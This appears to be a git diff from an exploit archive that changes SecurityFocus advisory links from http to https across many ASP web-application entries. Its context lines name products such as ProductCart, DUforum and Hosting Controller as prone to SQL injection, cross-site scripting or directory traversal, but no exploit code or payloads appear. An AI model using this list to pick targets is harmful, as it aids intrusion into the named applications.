7371d73bc..d299244e5 100644 --- a/exploits/asp/webapps/25595.txt +++ b/exploits/asp/webapps/25595.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13485/info +source: https://www.securityfocus.com/bid/13485/info ASP Inline Corporate Calendar is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/25596.txt b/exploits/asp/webapps/25596.txt index 7ac512b2a..5db48f768 100644 --- a/exploits/asp/webapps/25596.txt +++ b/exploits/asp/webapps/25596.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13487/info +source: https://www.securityfocus.com/bid/13487/info ASP Inline Corporate Calendar is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/25651.txt b/exploits/asp/webapps/25651.txt index 7cb0f2c44..cd79a9da0 100644 --- a/exploits/asp/webapps/25651.txt +++ b/exploits/asp/webapps/25651.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13601/info +source: https://www.securityfocus.com/bid/13601/info MaxWebPortal is affected by multiple remote vulnerabilities. These issues may allow an attacker to carry out cross-site scripting, SQL injection and HTML injection attacks. diff --git a/exploits/asp/webapps/25661.txt b/exploits/asp/webapps/25661.txt index e5ccc3e53..919fea716 100644 --- a/exploits/asp/webapps/25661.txt +++ b/exploits/asp/webapps/25661.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13630/info +source: https://www.securityfocus.com/bid/13630/info Keyvan1 ImageGallery is prone to an access validation vulnerability that could allow the underlying database to be downloaded. diff --git a/exploits/asp/webapps/25667.txt b/exploits/asp/webapps/25667.txt index 2c8b9640b..3782dce32 100644 --- a/exploits/asp/webapps/25667.txt +++ b/exploits/asp/webapps/25667.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13639/info +source: https://www.securityfocus.com/bid/13639/info MetaCart e-Shop is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25700.txt b/exploits/asp/webapps/25700.txt index 602c379cb..ced8c435f 100644 --- a/exploits/asp/webapps/25700.txt +++ b/exploits/asp/webapps/25700.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13733/info +source: https://www.securityfocus.com/bid/13733/info Spread The Word is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25701.txt b/exploits/asp/webapps/25701.txt index e3df5e09c..551d6efb1 100644 --- a/exploits/asp/webapps/25701.txt +++ b/exploits/asp/webapps/25701.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13737/info +source: https://www.securityfocus.com/bid/13737/info Spread The Word is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25705.txt b/exploits/asp/webapps/25705.txt index 05cb6d483..467251f91 100644 --- a/exploits/asp/webapps/25705.txt +++ b/exploits/asp/webapps/25705.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13761/info +source: https://www.securityfocus.com/bid/13761/info FunkyASP AD Systems is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/25751.txt b/exploits/asp/webapps/25751.txt index ea604587c..88e8d37b0 100644 --- a/exploits/asp/webapps/25751.txt +++ b/exploits/asp/webapps/25751.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13804/info +source: https://www.securityfocus.com/bid/13804/info os4e is prone to an SQL injection vulnerability. diff --git a/exploits/asp/webapps/25753.txt b/exploits/asp/webapps/25753.txt index abcd2c41b..ab29cc7b8 100644 --- a/exploits/asp/webapps/25753.txt +++ b/exploits/asp/webapps/25753.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13806/info +source: https://www.securityfocus.com/bid/13806/info Hosting Controller is reported prone to multiple vulnerabilities. These issues can allow an attacker gain unauthorized access to data and carry out SQL injection attacks. diff --git a/exploits/asp/webapps/25754.txt b/exploits/asp/webapps/25754.txt index a633102bf..9bd4a3dee 100644 --- a/exploits/asp/webapps/25754.txt +++ b/exploits/asp/webapps/25754.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13806/info +source: https://www.securityfocus.com/bid/13806/info Hosting Controller is reported prone to multiple vulnerabilities. These issues can allow an attacker gain unauthorized access to data and carry out SQL injection attacks. diff --git a/exploits/asp/webapps/25758.txt b/exploits/asp/webapps/25758.txt index 4c9fc76c1..10bc10482 100644 --- a/exploits/asp/webapps/25758.txt +++ b/exploits/asp/webapps/25758.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13816/info +source: https://www.securityfocus.com/bid/13816/info Hosting Controller is prone to an unauthorized access vulnerability. diff --git a/exploits/asp/webapps/25780.txt b/exploits/asp/webapps/25780.txt index cb409c0ac..2d85bd7cb 100644 --- a/exploits/asp/webapps/25780.txt +++ b/exploits/asp/webapps/25780.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13833/info +source: https://www.securityfocus.com/bid/13833/info JiRo's Upload System is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/25781.txt b/exploits/asp/webapps/25781.txt index 415d6ce14..75e3667b2 100644 --- a/exploits/asp/webapps/25781.txt +++ b/exploits/asp/webapps/25781.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13834/info +source: https://www.securityfocus.com/bid/13834/info NEXTWEB (i)Site is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/25783.txt b/exploits/asp/webapps/25783.txt index 32911d3cb..e5094b3ab 100644 --- a/exploits/asp/webapps/25783.txt +++ b/exploits/asp/webapps/25783.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13836/info +source: https://www.securityfocus.com/bid/13836/info livingmailing is prone to an SQL injection vulnerability. diff --git a/exploits/asp/webapps/25785.txt b/exploits/asp/webapps/25785.txt index 48090ff9b..af429c663 100644 --- a/exploits/asp/webapps/25785.txt +++ b/exploits/asp/webapps/25785.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13841/info +source: https://www.securityfocus.com/bid/13841/info Liberum Help Desk is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25790.txt b/exploits/asp/webapps/25790.txt index 60af32437..a680ccd32 100644 --- a/exploits/asp/webapps/25790.txt +++ b/exploits/asp/webapps/25790.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13859/info +source: https://www.securityfocus.com/bid/13859/info WWWeb Concepts Events System is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'login.asp' script before using it in an SQL query. diff --git a/exploits/asp/webapps/25795.txt b/exploits/asp/webapps/25795.txt index 001ad21ba..1433f40b0 100644 --- a/exploits/asp/webapps/25795.txt +++ b/exploits/asp/webapps/25795.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13881/info +source: https://www.securityfocus.com/bid/13881/info ProductCart is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25796.txt b/exploits/asp/webapps/25796.txt index 8cf4a4188..650af91b6 100644 --- a/exploits/asp/webapps/25796.txt +++ b/exploits/asp/webapps/25796.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13881/info +source: https://www.securityfocus.com/bid/13881/info ProductCart is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25797.txt b/exploits/asp/webapps/25797.txt index 5b122adc0..3aeb7550a 100644 --- a/exploits/asp/webapps/25797.txt +++ b/exploits/asp/webapps/25797.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13881/info +source: https://www.securityfocus.com/bid/13881/info ProductCart is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25798.txt b/exploits/asp/webapps/25798.txt index 8544a3463..fac979ae6 100644 --- a/exploits/asp/webapps/25798.txt +++ b/exploits/asp/webapps/25798.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13881/info +source: https://www.securityfocus.com/bid/13881/info ProductCart is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25804.txt b/exploits/asp/webapps/25804.txt index 2d36cef70..0f006ce5d 100644 --- a/exploits/asp/webapps/25804.txt +++ b/exploits/asp/webapps/25804.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13898/info +source: https://www.securityfocus.com/bid/13898/info Loki Download Manager is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'default.asp' script before using it in an SQL query. diff --git a/exploits/asp/webapps/25805.txt b/exploits/asp/webapps/25805.txt index 2c2320513..d47a45909 100644 --- a/exploits/asp/webapps/25805.txt +++ b/exploits/asp/webapps/25805.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13900/info +source: https://www.securityfocus.com/bid/13900/info Loki Download Manager is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'catinfo.asp' script before using it in an SQL query. diff --git a/exploits/asp/webapps/25839.txt b/exploits/asp/webapps/25839.txt index 68c98ab3c..166d045b3 100644 --- a/exploits/asp/webapps/25839.txt +++ b/exploits/asp/webapps/25839.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13976/info +source: https://www.securityfocus.com/bid/13976/info Cool Cafe Chat is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'login.asp' script before using it in an SQL query. diff --git a/exploits/asp/webapps/25843.txt b/exploits/asp/webapps/25843.txt index 6bf76a8fc..8e29d138c 100644 --- a/exploits/asp/webapps/25843.txt +++ b/exploits/asp/webapps/25843.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13991/info +source: https://www.securityfocus.com/bid/13991/info Ublog Reload is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25844.txt b/exploits/asp/webapps/25844.txt index 9125a1879..78eeee7e0 100644 --- a/exploits/asp/webapps/25844.txt +++ b/exploits/asp/webapps/25844.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13991/info +source: https://www.securityfocus.com/bid/13991/info Ublog Reload is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25845.txt b/exploits/asp/webapps/25845.txt index 88682930d..9dc62c2aa 100644 --- a/exploits/asp/webapps/25845.txt +++ b/exploits/asp/webapps/25845.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13994/info +source: https://www.securityfocus.com/bid/13994/info Ublog Reload is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25847.txt b/exploits/asp/webapps/25847.txt index 3f0cf3908..d5d09c666 100644 --- a/exploits/asp/webapps/25847.txt +++ b/exploits/asp/webapps/25847.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13998/info +source: https://www.securityfocus.com/bid/13998/info StoreFront Shopping Cart is affected by an SQL injection vulnerability. The vulnerability affects the 'login.asp' script. diff --git a/exploits/asp/webapps/25853.txt b/exploits/asp/webapps/25853.txt index 5e9c52d28..3851792fd 100644 --- a/exploits/asp/webapps/25853.txt +++ b/exploits/asp/webapps/25853.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14000/info +source: https://www.securityfocus.com/bid/14000/info i-Gallery is prone to a directory traversal vulnerability. diff --git a/exploits/asp/webapps/25855.txt b/exploits/asp/webapps/25855.txt index be11afa1b..d442898e1 100644 --- a/exploits/asp/webapps/25855.txt +++ b/exploits/asp/webapps/25855.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14002/info +source: https://www.securityfocus.com/bid/14002/info i-Gallery is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'folder' parameter of 'folderview.asp'. diff --git a/exploits/asp/webapps/25858.txt b/exploits/asp/webapps/25858.txt index 94211da7b..9f5efd37c 100644 --- a/exploits/asp/webapps/25858.txt +++ b/exploits/asp/webapps/25858.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14029/info +source: https://www.securityfocus.com/bid/14029/info DUportal Pro is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25863.txt b/exploits/asp/webapps/25863.txt index f919bfafe..867562794 100644 --- a/exploits/asp/webapps/25863.txt +++ b/exploits/asp/webapps/25863.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14033/info +source: https://www.securityfocus.com/bid/14033/info DUamazon Pro is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25864.txt b/exploits/asp/webapps/25864.txt index 963b9c422..808bf2fde 100644 --- a/exploits/asp/webapps/25864.txt +++ b/exploits/asp/webapps/25864.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14033/info +source: https://www.securityfocus.com/bid/14033/info DUamazon Pro is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25865.txt b/exploits/asp/webapps/25865.txt index 08182955d..c8ce31530 100644 --- a/exploits/asp/webapps/25865.txt +++ b/exploits/asp/webapps/25865.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14033/info +source: https://www.securityfocus.com/bid/14033/info DUamazon Pro is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25866.txt b/exploits/asp/webapps/25866.txt index 36f1ff3e4..8a8b007fe 100644 --- a/exploits/asp/webapps/25866.txt +++ b/exploits/asp/webapps/25866.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14034/info +source: https://www.securityfocus.com/bid/14034/info DUpaypal Pro is prone to multiple SQL-injection vulnerabilities because the fails application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25867.txt b/exploits/asp/webapps/25867.txt index d64227e37..8b46f31dd 100644 --- a/exploits/asp/webapps/25867.txt +++ b/exploits/asp/webapps/25867.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14034/info +source: https://www.securityfocus.com/bid/14034/info DUpaypal Pro is prone to multiple SQL-injection vulnerabilities because the fails application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25868.txt b/exploits/asp/webapps/25868.txt index fe684a432..c1faa5a54 100644 --- a/exploits/asp/webapps/25868.txt +++ b/exploits/asp/webapps/25868.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14035/info +source: https://www.securityfocus.com/bid/14035/info DUforum is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25869.txt b/exploits/asp/webapps/25869.txt index 3099f7533..7adb26860 100644 --- a/exploits/asp/webapps/25869.txt +++ b/exploits/asp/webapps/25869.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14035/info +source: https://www.securityfocus.com/bid/14035/info DUforum is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25870.txt b/exploits/asp/webapps/25870.txt index 071a2b653..93a027d60 100644 --- a/exploits/asp/webapps/25870.txt +++ b/exploits/asp/webapps/25870.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14035/info +source: https://www.securityfocus.com/bid/14035/info DUforum is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25871.txt b/exploits/asp/webapps/25871.txt index 98e25b467..aa7b5914a 100644 --- a/exploits/asp/webapps/25871.txt +++ b/exploits/asp/webapps/25871.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14035/info +source: https://www.securityfocus.com/bid/14035/info DUforum is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25872.txt b/exploits/asp/webapps/25872.txt index 7ea550d1e..a919af6bd 100644 --- a/exploits/asp/webapps/25872.txt +++ b/exploits/asp/webapps/25872.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14036/info +source: https://www.securityfocus.com/bid/14036/info DUclassmate is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25873.txt b/exploits/asp/webapps/25873.txt index 571004560..b8f958819 100644 --- a/exploits/asp/webapps/25873.txt +++ b/exploits/asp/webapps/25873.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14036/info +source: https://www.securityfocus.com/bid/14036/info DUclassmate is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25874.txt b/exploits/asp/webapps/25874.txt index 72c005baa..9053e53e7 100644 --- a/exploits/asp/webapps/25874.txt +++ b/exploits/asp/webapps/25874.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14039/info +source: https://www.securityfocus.com/bid/14039/info WhatsUp Professional is prone to an SQL injection vulnerability affecting its Web-based front end. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'login.asp' script before using it in an SQL query. diff --git a/exploits/asp/webapps/25905.txt b/exploits/asp/webapps/25905.txt index c2fcbc438..1f1dd8d93 100644 --- a/exploits/asp/webapps/25905.txt +++ b/exploits/asp/webapps/25905.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14062/info +source: https://www.securityfocus.com/bid/14062/info ASPNuke is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25906.txt b/exploits/asp/webapps/25906.txt index 6a9475c2e..cfbfc51a4 100644 --- a/exploits/asp/webapps/25906.txt +++ b/exploits/asp/webapps/25906.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14062/info +source: https://www.securityfocus.com/bid/14062/info ASPNuke is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25907.txt b/exploits/asp/webapps/25907.txt index bc749c2c9..59132a0bc 100644 --- a/exploits/asp/webapps/25907.txt +++ b/exploits/asp/webapps/25907.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14063/info +source: https://www.securityfocus.com/bid/14063/info ASPNuke is prone to an HTTP response splitting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25908.txt b/exploits/asp/webapps/25908.txt index 5df628404..2d73c9cd2 100644 --- a/exploits/asp/webapps/25908.txt +++ b/exploits/asp/webapps/25908.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14070/info +source: https://www.securityfocus.com/bid/14070/info ASPPlayground.NET is prone to a remote arbitrary file-upload vulnerability. diff --git a/exploits/asp/webapps/25910.txt b/exploits/asp/webapps/25910.txt index f072760ae..1d18e42dd 100644 --- a/exploits/asp/webapps/25910.txt +++ b/exploits/asp/webapps/25910.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14078/info +source: https://www.securityfocus.com/bid/14078/info Community Server Forums is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25913.txt b/exploits/asp/webapps/25913.txt index 58b11c2d4..642f1abb5 100644 --- a/exploits/asp/webapps/25913.txt +++ b/exploits/asp/webapps/25913.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14080/info +source: https://www.securityfocus.com/bid/14080/info Hosting Controller is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'error.asp' script. diff --git a/exploits/asp/webapps/25914.txt b/exploits/asp/webapps/25914.txt index b20287dec..eab9a7c41 100644 --- a/exploits/asp/webapps/25914.txt +++ b/exploits/asp/webapps/25914.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14083/info +source: https://www.securityfocus.com/bid/14083/info Dynamic Biz Website Builder (QuickWeb) is prone to an SQL injection vulnerability. diff --git a/exploits/asp/webapps/25922.txt b/exploits/asp/webapps/25922.txt index b137079f1..9612aa295 100644 --- a/exploits/asp/webapps/25922.txt +++ b/exploits/asp/webapps/25922.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14101/info +source: https://www.securityfocus.com/bid/14101/info CyberStrong eShop is prone to an SQL-injection vulnerability. As a result, the attacker may modify the structure and logic of an SQL query that is made by the application. The attacker may accomplish this by passing malicious SQL syntax to the vulnerable '20review.asp' script. diff --git a/exploits/asp/webapps/25923.txt b/exploits/asp/webapps/25923.txt index 3ff84f6c9..c68a0efef 100644 --- a/exploits/asp/webapps/25923.txt +++ b/exploits/asp/webapps/25923.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14103/info +source: https://www.securityfocus.com/bid/14103/info CyberStrong eShop is prone to an SQL injection vulnerability. As a result, the attacker may modify the structure and logic of an SQL query that is made by the application. The attacker may accomplish this by passing malicious SQL syntax to the vulnerable '10expand.asp' script. diff --git a/exploits/asp/webapps/25924.txt b/exploits/asp/webapps/25924.txt index d4d6f9d84..31ce4ff03 100644 --- a/exploits/asp/webapps/25924.txt +++ b/exploits/asp/webapps/25924.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14111/info +source: https://www.securityfocus.com/bid/14111/info FSboard is prone to a directory traversal vulnerability. diff --git a/exploits/asp/webapps/25925.txt b/exploits/asp/webapps/25925.txt index 5528d9c96..11287e763 100644 --- a/exploits/asp/webapps/25925.txt +++ b/exploits/asp/webapps/25925.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14112/info +source: https://www.securityfocus.com/bid/14112/info CyberStrong eShop is prone to an SQL injection vulnerability. As a result, the attacker may modify the structure and logic of an SQL query that is made by the application. The attacker may accomplish this by passing malicious SQL syntax to the vulnerable '10browse.asp' script. diff --git a/exploits/asp/webapps/25953.txt b/exploits/asp/webapps/25953.txt index b4bf9ed1c..1352e43c2 100644 --- a/exploits/asp/webapps/25953.txt +++ b/exploits/asp/webapps/25953.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14183/info +source: https://www.securityfocus.com/bid/14183/info Comersus Cart is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25956.txt b/exploits/asp/webapps/25956.txt index cbeae18e1..8519202ef 100644 --- a/exploits/asp/webapps/25956.txt +++ b/exploits/asp/webapps/25956.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14191/info +source: https://www.securityfocus.com/bid/14191/info Comersus Cart is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25963.txt b/exploits/asp/webapps/25963.txt index 1997dabca..adad2d1f6 100644 --- a/exploits/asp/webapps/25963.txt +++ b/exploits/asp/webapps/25963.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14220/info +source: https://www.securityfocus.com/bid/14220/info Dragonfly Commerce is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25965.txt b/exploits/asp/webapps/25965.txt index 42f790c3e..74afcbd00 100644 --- a/exploits/asp/webapps/25965.txt +++ b/exploits/asp/webapps/25965.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14223/info +source: https://www.securityfocus.com/bid/14223/info Dvbbs is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25981.txt b/exploits/asp/webapps/25981.txt index 97eb31ffd..fb873ee5f 100644 --- a/exploits/asp/webapps/25981.txt +++ b/exploits/asp/webapps/25981.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14258/info +source: https://www.securityfocus.com/bid/14258/info Hosting Controller is prone to an SQL injection vulnerability. diff --git a/exploits/asp/webapps/26033.txt b/exploits/asp/webapps/26033.txt index bf5dd1bac..6f1732ae3 100644 --- a/exploits/asp/webapps/26033.txt +++ b/exploits/asp/webapps/26033.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14386/info +source: https://www.securityfocus.com/bid/14386/info CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26069.txt b/exploits/asp/webapps/26069.txt index a34c8a805..3771f8b18 100644 --- a/exploits/asp/webapps/26069.txt +++ b/exploits/asp/webapps/26069.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14468/info +source: https://www.securityfocus.com/bid/14468/info Naxtor E-directory is prone to a cross-site scripting vulnerability. diff --git a/exploits/asp/webapps/26070.txt b/exploits/asp/webapps/26070.txt index 8de0fb882..85fab0b4c 100644 --- a/exploits/asp/webapps/26070.txt +++ b/exploits/asp/webapps/26070.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14469/info +source: https://www.securityfocus.com/bid/14469/info Naxtor E-directory is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/26107.txt b/exploits/asp/webapps/26107.txt index 4d41dff3f..65c8b2558 100644 --- a/exploits/asp/webapps/26107.txt +++ b/exploits/asp/webapps/26107.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14498/info +source: https://www.securityfocus.com/bid/14498/info DVBBS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26108.txt b/exploits/asp/webapps/26108.txt index d5ea76e3a..85576d3ab 100644 --- a/exploits/asp/webapps/26108.txt +++ b/exploits/asp/webapps/26108.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14498/info +source: https://www.securityfocus.com/bid/14498/info DVBBS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26109.txt b/exploits/asp/webapps/26109.txt index 00895d8f0..7f996365d 100644 --- a/exploits/asp/webapps/26109.txt +++ b/exploits/asp/webapps/26109.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14498/info +source: https://www.securityfocus.com/bid/14498/info DVBBS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26154.txt b/exploits/asp/webapps/26154.txt index d28dc7a3f..dec5d9a37 100644 --- a/exploits/asp/webapps/26154.txt +++ b/exploits/asp/webapps/26154.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14575/info +source: https://www.securityfocus.com/bid/14575/info PersianBlog is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/26156.txt b/exploits/asp/webapps/26156.txt index 47d0619e5..bd879b133 100644 --- a/exploits/asp/webapps/26156.txt +++ b/exploits/asp/webapps/26156.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14577/info +source: https://www.securityfocus.com/bid/14577/info CPAINT is prone to an input validation vulnerability. This issue occurs because the application fails to properly sanitize malicious scripts and requests from user-supplied input. diff --git a/exploits/asp/webapps/26291.txt b/exploits/asp/webapps/26291.txt index 3f60a8843..ebdbd27af 100644 --- a/exploits/asp/webapps/26291.txt +++ b/exploits/asp/webapps/26291.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14898/info +source: https://www.securityfocus.com/bid/14898/info Mall23 is prone to an SQL injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/26333.html b/exploits/asp/webapps/26333.html index e8237afda..b82735d98 100644 --- a/exploits/asp/webapps/26333.html +++ b/exploits/asp/webapps/26333.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15036/info +source: https://www.securityfocus.com/bid/15036/info Aenovo, aeNovoShop and aeNovoWYSI are prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/26334.txt b/exploits/asp/webapps/26334.txt index f295b4113..9501d6458 100644 --- a/exploits/asp/webapps/26334.txt +++ b/exploits/asp/webapps/26334.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15036/info +source: https://www.securityfocus.com/bid/15036/info Aenovo, aeNovoShop and 